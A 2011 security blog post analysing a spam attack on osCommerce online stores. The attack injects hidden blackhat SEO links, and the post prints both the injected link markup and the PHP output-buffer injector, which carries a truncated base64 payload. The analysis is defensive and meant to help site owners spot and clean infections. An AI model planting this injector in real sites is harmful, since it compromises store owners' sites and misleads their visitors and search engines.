The Latest in IT Security

Attacks against osCommerce sites – Spam / google_analytics_obh

10
Aug
2011


It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?


*If you have an osCommerce site, please follow at least those steps to make sure it doesn’t keep getting hacked. You can also scan it here to check if it is clean: http://sitecheck.sucuri.net


Anyway, after all the latest osCommerce malware (div_colors, nt07.in, CreateCSS, willysy.com, etc), we are seeing an old attack coming back in full force and compromising thousands of sites.

The attack is the “__google_analytics_obh” that add hidden links (for Blackhat SEO spam) to the sites. It has been happening for a while, but for the last few days, it just grew in mass scale.

This is what shows up on a compromised site:

<!–4566d6815c68357b60bb1–><div style="position:absolute;  left:324px;  top:  -100px;"><a href="http://www&#46gamedak&#46com/">online games</a></div><!–/4556d684abc4d1b60bb1–>

Those hidden links are generated from a base64_decode piece at the top of the PHP files:

<?php // 24d684abc4d11125c68357b60bb3aa0b
if (!function_exists(‘__google_analytics_obh’)){
function __google_analytics_obh ($c){
    $i = base64_decode(‘PCEtLTI0ZDY4NGFiYzRkMTExMjVjN..’);
    $tmpdir = getenv(‘TMP’);
    if (empty($tmpdir)) $tmpdir = getenv(‘TEMP’);
    if (empty($tmpdir)) $tmpdir = getenv(‘TMPDIR’);
    $pgid = @$_SERVER[‘REQUEST_URI’];
    if (empty($pgid)) $pgid = __FILE__;
    $f = $tmpdir&#46md5(’42:)’&#46$pgid);
    if (!file_exists($f))
    {
        $pos = mt_rand(0, 10) / 10;
        file_put_contents($f, $pos);
    }
    else $pos = file_get_contents($f);
    $c2 = strtolower($c);
    $tags = array(‘</p>’, ’</div>’, ’</table>’);
    $injpos = strpos($c2, ’</body>’) or strlen($c);
    $p = round($injpos * $pos);
    if ($p < 0) $p = 0; if ($p > $injpos) $p = $injpos;
    foreach ($tags as $tag) {
        $t = strpos($c2, $tag, $p);
        if ($t)
        {
            $injpos = $t + strlen($tag);
            break;
        }
    }
        return substr($c, 0, $injpos) &#46 $i &#46 substr($c, $injpos);
    }
    @ob_start(__google_analytics_obh);
}

The spam links are changing on each site, sometimes pointing to online game stores, pharma, and all types of sites (including a spam to http://192–168–1–1.info/, with the keyword 192.168.1.1).

Why are the attackers focusing on spam and not on malware? Probably because they are harder to detect and can provide some valuable PR (page rank) to their other sites. Specially if they are also in the SEO business and selling that to their clients.

Comments?

Leave a reply


Categories

MONDAY, OCTOBER 26, 2020
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments